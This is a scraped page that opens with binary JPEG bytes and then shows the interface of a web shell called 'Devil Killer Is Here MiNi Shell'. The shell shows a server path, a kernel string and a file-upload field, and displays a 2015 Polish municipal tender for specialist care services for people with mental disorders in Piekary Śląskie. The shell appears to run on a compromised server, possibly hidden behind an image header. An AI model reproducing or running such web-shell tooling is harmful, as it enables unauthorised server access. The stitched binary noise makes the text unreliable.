JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/330264-N-2015.html

<p class="kh_header"><b>Piekary Śląskie: Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w miejscu zamieszkania na terenie miasta Piekary Śląskie</b><br>
<b>Numer ogłoszenia: 330264 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Bpa Nankera 103, 41-949 Piekary Śląskie, woj. śląskie, tel. 32 288 35 74; 287 95 03, faks 32 287 95 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w miejscu zamieszkania na terenie miasta Piekary Śląskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na świadczeniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w miejscu zamieszkania na terenie miasta Piekary Śląskie.

Usługa polegająca na realizacji zadania obejmującego opiekę, pielęgnację i pomoc, w zakresie zaspokajania codziennych potrzeb życiowych i zdrowotnych, dla osób tego wymagających, będących w trudnej sytuacji w związku z chorobą psychiczną lub niepełnosprawnością intelektualną (w tym między innymi osób z autyzmem) wskazanych przez Miejski Ośrodek Pomocy Rodzinie. 

Świadczenie  usług objętych zamówieniem odbywać się będzie przez 7 dni w tygodniu.

Przedmiotowe usługi będą świadczone przez osoby:
1. wymienione w Załączniku nr 5 do SIWZ, 
2. zatrudnione u Wykonawcy na podstawie stosunku pracy lub umowy cywilnoprawnej,
3. sprawne fizycznie i intelektualnie, zdolne pod względem zdrowotnym do wykonywania prac w zakresie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi,
4. posiadające umiejętności poprawnego utrzymywania kontaktów interpersonalnych, 
5. osoby posiadające specjalistyczne przygotowanie zawodowe określone w Rozporządzeniu  Ministra Polityki Społecznej z dnia 22 września 2005 roku w sprawie specjalistycznych usług opiekuńczych (Dz.U. Nr 189,poz.1598 z poźn. Zmianami), a mianowicie muszą posiadać kwalifikacje do wykonania zawodu:
- pracownika socjalnego,
- psychologa,
- pedagoga,
- logopedy,
- terapeuty zajęciowego,
- pielęgniarki,
- asystenta osoby niepełnosprawnej,
- opiekunki środowiskowej,
- specjalisty w zakresie rehabilitacji medycznej,
- fizjoterapeuty,
- lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.

a) Osoby świadczące specjalistyczne usługi dla osób z zaburzeniami psychicznymi muszą posiadać co najmniej półroczny staż pracy w jednej z następujących jednostek:
1)  szpitalu psychiatrycznym,
2)  jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi,
3)  placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym,
4)  ośrodku terapeutyczno - edukacyjno - wychowawczym,
5)  zakładzie rehabilitacji,
6)  innej jednostce niż wymienione w pkt 1-5 wyżej świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi,
b) w uzasadnionych przypadkach specjalistyczne usługi mogą być świadczone przez osoby, które zdobywają lub podnoszą wymagane kwalifikacje zawodowe określone w pkt 5,
c) posiadają co najmniej roczny staż pracy w jednostkach, o których mowa w pkt. 5a i mają zapewnioną możliwość konsultacji z osobami świadczącymi specjalistyczne usługi, posiadającymi wymagane kwalifikacje,
d) osoby świadczące specjalistyczne usługi dla osób z zaburzeniami psychicznymi muszą posiadać  udokumentowane przeszkolenie i doświadczenie w zakresie:
- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań,
- kształtowania nawyków celowej aktywności,
- prowadzenia treningu zachowań społecznych.
e) w przypadku osób świadczących usługi dla osób z autyzmem dodatkowo wymagane jest udokumentowanie, odpowiedniego przygotowania i kwalifikacji w tym zakresie.

Wykonawca ponosi odpowiedzialność za staranność w wyborze osób, przy pomocy których będzie świadczył usługi objęte niniejszym zamówieniem oraz prawidłowość wykonywanych przez nie czynności i obowiązków w powyższym zakresie. 

W przypadku konieczności zatrudnienia dodatkowych lub zmiany osób wykonujących zamówienie, Wykonawca zapewni na ich miejsce osoby o kwalifikacjach i doświadczeniu nie niższych niż zaproponowane  w ofercie. 
Dopuszcza się maksymalnie jedną zmianę osoby świadczącej usługi w okresie obowiązywania decyzji przyznającej świadczenie - wyłącznie w sytuacjach uzasadnionych wolą klienta lub gdy z osobą świadczącą usługi rozwiązano umowę na podstawie której wykonywała czynności. 
Zmiana osoby świadczącej usługi może nastąpić także w każdym czasie, w związku ze stwierdzeniem zarówno przez Wykonawcę jak i Zamawiającego nieprawidłowości w zakresie wykonywania usług na rzecz klienta. 
Wykonawca zobowiązany jest niezwłocznie tj, w ciągu 24 godzin, do przekazania osobie dla której świadczone są usługi informacji o zmianie pracownika świadczącego usługi. Wykonawca zawiadamia pisemnie Zamawiającego o dokonanej zmianie w najbliższy dzień roboczy. 
Ponadto Wykonawca przedstawia Zamawiającemu informację o kwalifikacjach i formie zatrudnienia osób świadczących usługi w terminie 7 dni od daty rozpoczęcia świadczenia usług u klienta celem ostatecznej akceptacji. 
W okresie nieobecności osoby świadczącej usługi w związku z przebywaniem na zwolnieniu lekarskim lub korzystaniem z urlopu wypoczynkowego lub okolicznościowego, dopuszcza się możliwość skierowania do wykonania usług innej osoby pod warunkiem wcześniejszego powiadomienia klienta. 

Obowiązki Wykonawcy wynikające z umowy:
1. Do zadań Wykonawcy należy realizowanie przedmiotowego zadania zgodnie z zakresem dostosowanym do szczególnych potrzeb osób  wymagających pomocy według :
- szczegółowego zakresu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w tym dla dzieci z autyzmem stanowiącego Załącznik nr 1 do umowy.
2. Podjęcie czynności związanych ze świadczeniem usług nie później niż w ciągu 24 godzin od chwili zgłoszenia o potrzebie ich zapewnienia, a w przypadku nagłym niezwłocznie po otrzymaniu zgłoszenia. Zlecenie realizacji usług opiekuńczych dla osób z zaburzeniami psychicznymi na rzecz konkretnej osoby będzie przekazywane telefonicznie oraz w formie pisemnej, w postaci zgłoszenia wejścia w środowisko, które stanowi Załącznik Nr 2 do umowy. W przypadkach nagłych dopuszcza się możliwość telefonicznego zgłoszenia o potrzebie zapewnienia usług - Zamawiający w takim przypadku zobowiązuje się do dosłania zgłoszenia w ciągu 1 dnia roboczego.
3. Zamawiający powierza Wykonawcy do przetwarzania dane osobowe podopiecznych Zamawiającego korzystających ze specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi zgodnie z art. 31 ustawy o ochronie danych osobowych, w zakresie określonym w przedmiocie zamówienia i w celu jego realizacji.
4. Administratorem danych osobowych jest Miejski Ośrodek Pomocy Rodzinie w Piekarach Śląskich. Wykonawca jest procesorem danych osobowych stosownie do art. 31 ustawy o ochronie danych osobowych i jest zobowiązany do jej przestrzegania.
5. Wykonawca zobowiązuje się do zaprzestania przetwarzania danych osobowych po okresie obowiązywania umowy.
6. Wykonawca zobowiązuje się dopuścić do przetwarzania danych jedynie pracowników posiadających imienne upoważnienie.
7. Wykonawca oświadcza, że spełnia wymogi określone w § 31 ust. 3 ustawy o ochronie danych osobowych oraz dołoży wszelkich starań celem należytego zabezpieczenia danych - w tym podejmie środki zabezpieczające zbiór danych, o których mowa w art. 36-39 ww. ustawy.

8. Wskazać koordynatora z ramienia Wykonawcy odpowiedzialnego za bieżącą współpracę  z pracownikami Zamawiającego. Przez współpracę rozumie się wymianę informacji dotyczącą osób korzystających ze wsparcia w formie usług, które to stanowią przedmiot zamówienia, a są związane z realizacją przedmiotu zamówienia w szczególności:  
             a)  zmianę stanu zdrowia, mającą wpływ na zakres świadczonych usług,
             b)  brak możliwości wykonania usług. 
9. Informacje powinny być niezwłocznie zgłaszane na piśmie Zamawiającemu faksem (nr 32 2879503 wew.44) lub na adres e-mail: biuro@mopr.piekary.pl. W przypadku zgłaszania wstrzymania realizacji usług Wykonawca zobowiązany jest dokonać zgłoszenia niezwłocznie tj. nie później niż w pierwszym dniu roboczym po zaprzestaniu świadczenia usług na druku wstrzymania stanowiącym Załącznik nr 3 do umowy. Wstrzymanie usług następuje w sytuacji:
	a)  odmowy świadczenia usług przez klienta,
	b) pobytu w szpitalu lub innej placówce opiekuńczej lub rehabilitacyjnej i leczniczej trwającej dłużej niż 1 dobę,
	c)  wyjazdu do rodziny,
	d)  zgonu klienta.
10. Zapewnić osobom wykonującym usługi, wyposażenie w odpowiednie ubranie ochronne dostosowane do zakresu niesionej pomocy (rękawiczki, fartuchy itp.).
11. Dokumentowanie i przekazanie Zamawiającemu świadczenia usług poprzez prowadzenie kart pracy opiekunek świadczących usługi według Załącznika nr 4 do umowy oraz zestawienia realizowanych usług stanowiących Załącznik nr 5 do SIWZ. 
12. Karty pracy opiekunek świadczących usługi powinny być prowadzone w sposób rzetelny i skrupulatny. W przypadku braku prawidłowego prowadzenia kart pracy, Zamawiający uzna to jako nienależyte wykonanie umowy.
13. Zestawienie zrealizowanych usług powinno być zgodne z kartami pracy opiekunek świadczących usługi. W przypadku braku zgodności, Zamawiający uzna to jako nienależyte wykonanie umowy.
14.  Zapewnić klientowi niezbędną pomoc w sytuacjach nagłych, w szczególności takich jak:
a)  odniesienie poważnych obrażeń,
b)  ciężki stan zdrowia,
c)  zatrucie pokarmowe lub choroba zakaźna,
d)  zniszczenie domu w wyniku wandalizmu lub pożaru,
e)  kradzież na szkodę klienta.
15. Pokrywać wszelkie koszty związane z dojazdem osób świadczących usługi do klienta oraz koszty przejazdów wynikających z realizacji usług określonych w zakresie.
16. Do wskazanego w zgłoszeniu czasu trwania usług nie wlicza się czasu dotarcia osoby świadczącej usługi opiekuńcze do i od klienta. 

1.Szczegółowy zakres specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w tym  dla osób z autyzmem.
1.1 uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza:
     a) kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych takich, jak:
     -  samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym
        umiejętność  utrzymania i prowadzenia domu,
     -  dbałość o higienę i wygląd,
     -  utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością  lokalną,
     -  wspólne organizowanie i spędzanie czasu wolnego,
     -  korzystanie z usług różnych instytucji
  b) interwencja i pomoc w życiu w rodzinie, w tym:
     - pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,
    -  ułatwienie dostępu do edukacji i kultury, 
    -  doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług,
    -  kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi, 
    -  współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej
   c) pomoc w załatwianiu spraw urzędowych, w tym:
    -  w uzyskaniu świadczeń socjalnych, emerytalno - rentowych,
    -  w wypełnianiu dokumentów urzędowych,
  d) wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza:
  - w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego zajęcia, 
    w szczególności uczestnictwo w zajęciach Warsztatów Terapii Zajęciowej, zakładach  aktywności zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji  społecznej, klubach pracy,
 - w kompletowaniu dokumentów potrzebnych do zatrudnienia,
- w przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą,
     - w rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku, 
  e) pomoc w gospodarowaniu pieniędzmi, w tym:
     - nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,
     - pomoc w uzyskaniu ulg w opłatach,
- zwiększenie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe.
1.2  Pielęgnacja - jako wspieranie procesu leczenia, w tym:
    - pomoc w dostępie do świadczeń zdrowotnych,
    - uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych, 
    - pomoc w wykupywaniu lub zamawianiu leków w aptece,
    - pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,
    - w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków
pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny,
    - pomoc w dotarciu do placówek służby zdrowia,
    - pomoc w dotarciu do placówek rehabilitacyjnych,
1.3 Rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2008 r. o oświadczeniach opieki zdrowotnej finansowanych
      ze środków publicznych ( Dz.U. Nr 164, poz. 1027 )
    - zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii,
  - współpraca ze specjalistami w zakresie wspierania psychologiczno - pedagogicznego  i edukacyjno - terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług.
1.4 Pomoc mieszkaniowa, w tym:
   - w uzyskaniu mieszkania, negocjowaniu wnoszenia opłat,
   - w organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,
   - kształtowanie właściwych relacji osoby uzyskującej pomoc z sąsiadami i gospodarzem domu.
1.5 Zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć rehabilitacyjnych i rewalidacyjno- wychowawczych, w wyjątkowych przypadkach, jeżeli nie mają możliwości uzyskania dostępu do zajęć określonych w ustawie z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego (Dz. U. Nr 111 poz. 535 z późn. zm.).

Szacunkowo przedmiot zamówienia obejmuje:
- specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi - osoby dorosłe - 2 163 godzin w skali zamówienia, w tym  432 godziny dla osób z autyzmem.

Ilość godzin może ulec zmianie i nie można jej określić dokładnie ze względu na specyfikę zamówienia, którą cechuje zmienność potrzeb klientów z uwagi na zmieniający się ich stan zdrowia. Zamawiający zastrzega, iż nie będzie ponosił żadnej odpowiedzialności, jeżeli tylko część ww. godzin będzie realizowana.

Zamawiający zastrzega sobie również prawo zmiany ilości godzin przedmiotu zamówienia  w zależności od wysokości posiadanych środków w roku budżetowym oraz w zależności od potrzeb wynikających ze zmiany okoliczności powodujących przyznanie świadczenia.
Zamawiający zastrzega sobie prawo kontroli do świadczenia usług jak również dokumentowania świadczenia usług w siedzibie Wykonawcy.

Usługi będą świadczone na bieżąco według potrzeb przedstawionych przez Miejski Ośrodek Pomocy Rodzinie w Piekarach Śląskich lub do wyczerpania środków przewidzianych w umowie.

Wykonawca zobowiązany jest zapoznać się z całością Specyfikacji Istotnych Warunków Zamówienia (SIWZ) wraz z załącznikami, które są integralną częścią niniejszej specyfikacji.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających w wysokości do 50% wartości zamówienia podstawowego, o których mowa w art. 67 ust.1 pkt 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.20.00-9, 85.31.11.00-3, 85.31.12.00-4, 85.31.21.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie  ostatnich  trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej 2 usługi  w ilości nie mniejszej niż 2000 godzin na rok każda, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia oraz załączy dowody potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.
Zamawiający dokona oceny spełniania warunków według formuły spełnia-nie spełnia.
Ocena spełniania warunków zostanie dokonana na podstawie  złożonych przez Wykonawców wraz z ofertą, oświadczeń i dokumentów określonych w Rozdziale VIII SIWZ.
Z treści załączonych do oferty oświadczeń i dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia wszystkie warunki.
Niespełnienie przez Wykonawcę chociażby jednego warunku skutkować będzie wykluczeniem
Wykonawcy z postępowania, a w konsekwencji odrzuceniem jego oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje personelem niezbędnym do wykonania zamówienia tj. co najmniej 3 osobami, w tym 1 osobą pełniącą funkcję koordynatora usług specjalistycznych dla osób z zaburzeniami psychicznymi posiadającą wykształcenie co najmniej średnie oraz minimalny roczny staż na tym stanowisku oraz 2 osobami spełniającymi wymagania zawarte w rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005r. (Dz. U. Nr 189, poz. 1598 z późn.zm.)
Zamawiający dokona oceny spełniania warunków według formuły spełnia-nie spełnia.
Ocena spełniania warunków zostanie dokonana na podstawie  złożonych przez Wykonawców wraz z ofertą, oświadczeń i dokumentów określonych w Rozdziale VIII SIWZ.
Z treści załączonych do oferty oświadczeń i dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia wszystkie warunki.
Niespełnienie przez Wykonawcę chociażby jednego warunku skutkować będzie wykluczeniem
Wykonawcy z postępowania, a w konsekwencji odrzuceniem jego oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
